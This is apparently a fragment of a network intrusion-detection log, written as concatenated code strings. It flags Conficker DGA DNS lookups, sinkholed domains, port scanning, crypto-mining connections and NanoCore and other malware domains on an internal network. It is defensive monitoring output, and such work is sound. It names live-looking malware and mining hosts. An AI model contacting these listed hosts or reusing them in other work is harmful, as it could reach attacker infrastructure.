    '"2021-01-11 03:49:18.004025" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS kdibpc.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004216" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS drgpjefa.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004200" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS ghgohenb.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004028" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS ekirspbus.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004385" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vyizwtjpp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004535" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS hrxuicu.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004552" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS mfmovmtp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004213" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS drgpjefa.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004820" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS lpsksamyu.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004826" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (xxfagras).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:49:18.004398" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vyizwtjpp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004549" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS mfmovmtp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004812" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS lpsksamyu.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.004823" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS (xxfagras).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:49:18.005322" r2d2 2.200.109.50 62134 8.8.8.8 53 UDP DNS ekirspbus.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.005756" r2d2 2.200.109.50 61786 8.8.8.8 53 UDP DNS ghgohenb.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.006044" r2d2 2.200.109.50 60277 8.8.8.8 53 UDP DNS mfmovmtp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.006055" r2d2 2.200.109.50 60399 8.8.8.8 53 UDP DNS hrxuicu.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:18.023962" r2d2 8.8.8.8 53 2.200.109.50 61043 UDP DNS (xxfagras).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:18.027255" r2d2 8.8.8.8 53 2.200.109.50 61786 UDP DNS (ghgohenb).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:18.027252" r2d2 8.8.8.8 53 2.200.109.50 61786 UDP DNS (ghgohenb).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:18.129717" r2d2 8.8.8.8 53 2.200.109.50 60715 UDP DNS (drgpjefa).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:25.282326" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS xezwiy.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282346" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS jrkvlptmk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282339" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS xezwiy.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282495" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS nbewasxaa.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282619" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS rmfnisrjmn.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282825" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS czmrcd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282336" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS jrkvlptmk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283009" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS oeuvyj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282832" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS czmrcd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.282835" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS tvrkurtlv.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283094" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS ovlbidf.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283509" r2d2 2.200.109.50 61885 8.8.8.8 53 UDP DNS nbewasxaa.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283016" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS oeuvyj.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283225" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS pbsqgw.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.284144" r2d2 2.200.109.50 60174 8.8.8.8 53 UDP DNS pbsqgw.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283215" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS pbsqgw.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283332" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS ocnbwzkrzsc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283289" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS ocnbwzkrzsc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283570" r2d2 2.200.109.50 62520 8.8.8.8 53 UDP DNS rmfnisrjmn.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.283896" r2d2 2.200.109.50 60759 8.8.8.8 53 UDP DNS czmrcd.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:25.403430" r2d2 8.8.8.8 53 2.200.109.50 60874 UDP DNS (tvrkurtlv).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:25.403439" r2d2 8.8.8.8 53 2.200.109.50 60874 UDP DNS (tvrkurtlv).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:21.000119" r2d2 45.95.202.106 33386,35244,36100,39070,39090,41978,44202,44238,45880,49384,49422,54646,60640 2.200.107.85 82,84,88,89,91,1024,8000,8082,8084,8090,8888,9000,9200 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:49:21.000512" r2d2 45.95.202.106 40936,41906,42446,43130,46380,48298,54606,54996,55114,56444,57692 2.200.107.85 81,83,86,90,2000,3000,5000,6001,6003,8001,50000 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:49:32.142230" r2d2 10.43.192.103 59171 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:32.587201" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS xjtptu.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587384" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS fczumjbs.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587205" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS ysmlrmka.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587507" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS symlzi.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587517" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS symlzi.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587375" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS fczumjbs.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587767" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS meprdmsujun.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587586" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS dubbt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587774" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS hcmbyg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587520" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS dubbt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588047" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS xwbpsjoyhdm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587711" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS meprdmsujun.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588892" r2d2 2.200.109.50 60816 8.8.8.8 53 UDP DNS diwougapex.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588217" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS oycjamegkg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.587776" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS hcmbyg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.589022" r2d2 2.200.109.50 62453 8.8.8.8 53 UDP DNS oycjamegkg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588027" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS diwougapex.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588717" r2d2 2.200.109.50 61959 8.8.8.8 53 UDP DNS hcmbyg.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588040" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS xwbpsjoyhdm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588334" r2d2 2.200.109.50 62212 8.8.8.8 53 UDP DNS dubbt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.588900" r2d2 2.200.109.50 60638 8.8.8.8 53 UDP DNS xwbpsjoyhdm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:32.610452" r2d2 8.8.8.8 53 2.200.109.50 61959 UDP DNS (hcmbyg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:32.610444" r2d2 8.8.8.8 53 2.200.109.50 61959 UDP DNS (hcmbyg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:32.612355" r2d2 10.1.20.50 53 10.2.120.16 1690 UDP DNS (hcmbyg).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:40.041730" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS gyrxdumuowk.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041793" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS fkzbtaw.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041506" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS gyisgnl.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041559" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS azpuaz.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041544" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS mnoarhkgpna.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041737" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS gyrxdumuowk.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041566" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS azpuaz.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.041748" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS fkzbtaw.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042165" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS oibgqvxx.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042175" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS srcurpqdia.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042173" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS oibgqvxx.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042435" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS hlgqkxm.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042171" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS srcurpqdia.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042442" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS jfxlczw.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042561" r2d2 2.200.109.50 61228 8.8.8.8 53 UDP DNS gyisgnl.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042465" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS wlqhz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042457" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS wlqhz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.043536" r2d2 2.200.109.50 62168 8.8.8.8 53 UDP DNS jfxlczw.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042572" r2d2 2.200.109.50 60867 8.8.8.8 53 UDP DNS mnoarhkgpna.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.042750" r2d2 2.200.109.50 60994 8.8.8.8 53 UDP DNS gyrxdumuowk.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:40.043519" r2d2 2.200.109.50 61613 8.8.8.8 53 UDP DNS hlgqkxm.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:42.368521" r2d2 2.200.110.232 63640 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:49:42.395633" r2d2 2.200.110.233 64411 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:49:43.381351" r2d2 2.200.110.232 65108 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:49:44.226479" r2d2 10.43.192.103 59173 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:47.370763" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS pwclvjalhwv.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.370756" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS pwclvjalhwv.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.370761" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS ekubspsmzzb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.370814" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS rcrhc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.370867" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS rcrhc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371206" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS trwstl.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371002" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS gakvrzhbe.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371314" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS oqhkzj.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371260" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS trwstl.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371008" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS einfl.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371571" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS buoqybzuvca.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371448" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ycpcgok.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371628" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS ipivmtwraf.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371312" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS oqhkzj.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371578" r2d2 2.200.109.50 61878 8.8.8.8 53 UDP DNS pwclvjalhwv.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.372905" r2d2 2.200.109.50 60584 8.8.8.8 53 UDP DNS rcrhc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371451" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ycpcgok.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.372911" r2d2 2.200.109.50 60980 8.8.8.8 53 UDP DNS trwstl.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.371625" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS ipivmtwraf.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.372913" r2d2 2.200.109.50 62141 8.8.8.8 53 UDP DNS ycpcgok.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:47.391511" r2d2 8.8.8.8 53 2.200.109.50 60584 UDP DNS (rcrhc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:47.392998" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (einfl).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:47.391507" r2d2 8.8.8.8 53 2.200.109.50 60584 UDP DNS (rcrhc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:47.392316" r2d2 8.8.8.8 53 2.200.109.50 60167 UDP DNS (einfl).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:47.497409" r2d2 8.8.8.8 53 2.200.109.50 60980 UDP DNS (trwstl).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:47.596684" r2d2 8.8.8.8 53 2.200.109.50 62141 UDP DNS (ycpcgok).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:50.268028" r2d2 10.43.192.103 59174 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:54.651181" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS zdxmhlse.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651184" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS fbrpdi.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651171" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS fbrpdi.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651430" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS jjiqn.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651369" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS pqkvl.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651197" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS zdxmhlse.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651667" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS uxwinzfnm.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651611" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS ltvrcng.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651380" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS pqkvl.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.652034" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS usvwjhp.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651767" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS lmknpimqy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651658" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS uxwinzfnm.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.653488" r2d2 2.200.109.50 61297 8.8.8.8 53 UDP DNS wfrzylnwc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.652120" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS wfrzylnwc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.651848" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS yddoc.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.652024" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS usvwjhp.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.652132" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS wfrzylnwc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:54.652481" r2d2 2.200.109.50 62390 8.8.8.8 53 UDP DNS fbrpdi.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:57.884123" r2d2 10.1.19.42 59610 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:50:01.993151" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS iikfbco.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993142" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zcgowxrom.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993253" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS gsrao.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993322" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS gsrao.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993335" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS djrqaezojl.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993485" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS djrqaezojl.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993569" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS qpjyyjqy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993594" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS wajtgxqmfp.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.994019" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rcnwjh.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993838" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS ulpwwvuyj.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993129" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS iikfbco.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.994012" r2d2 2.200.109.50 61152 8.8.8.8 53 UDP DNS iikfbco.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993160" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zcgowxrom.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.994342" r2d2 2.200.109.50 62239 8.8.8.8 53 UDP DNS gsrao.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993582" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS qpjyyjqy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993827" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS moubmivjr.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.993946" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS nlahc.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:01.994022" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rcnwjh.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:02.014109" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (wajtgxqmfp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:02.013160" r2d2 8.8.8.8 53 2.200.109.50 61296 UDP DNS (wajtgxqmfp).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:02.344873" r2d2 10.43.192.103 59176 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:50:09.268896" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS rkdxt.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269075" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS ocmvfji.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.268907" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS mkcbelnf.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269096" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zmnxiohhbr.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269084" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS ocmvfji.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.268676" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS ovjfpb.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269296" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS kjxsuggs.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269277" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS pdocxh.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.268909" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS mkcbelnf.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269554" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS rvevats.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269092" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zmnxiohhbr.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269431" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS hkkjdblz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269718" r2d2 2.200.109.50 61144 8.8.8.8 53 UDP DNS ovjfpb.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269287" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS pdocxh.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269565" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS kewpoey.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269442" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS hkkjdblz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269790" r2d2 2.200.109.50 60867 8.8.8.8 53 UDP DNS ocmvfji.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.270753" r2d2 2.200.109.50 61188 8.8.8.8 53 UDP DNS rvevats.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269567" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS kewpoey.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.270251" r2d2 2.200.109.50 61223 8.8.8.8 53 UDP DNS pdocxh.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.269847" r2d2 2.200.109.50 61044 8.8.8.8 53 UDP DNS rkdxt.cc "conficker dga (malware)" 360.com\n' +
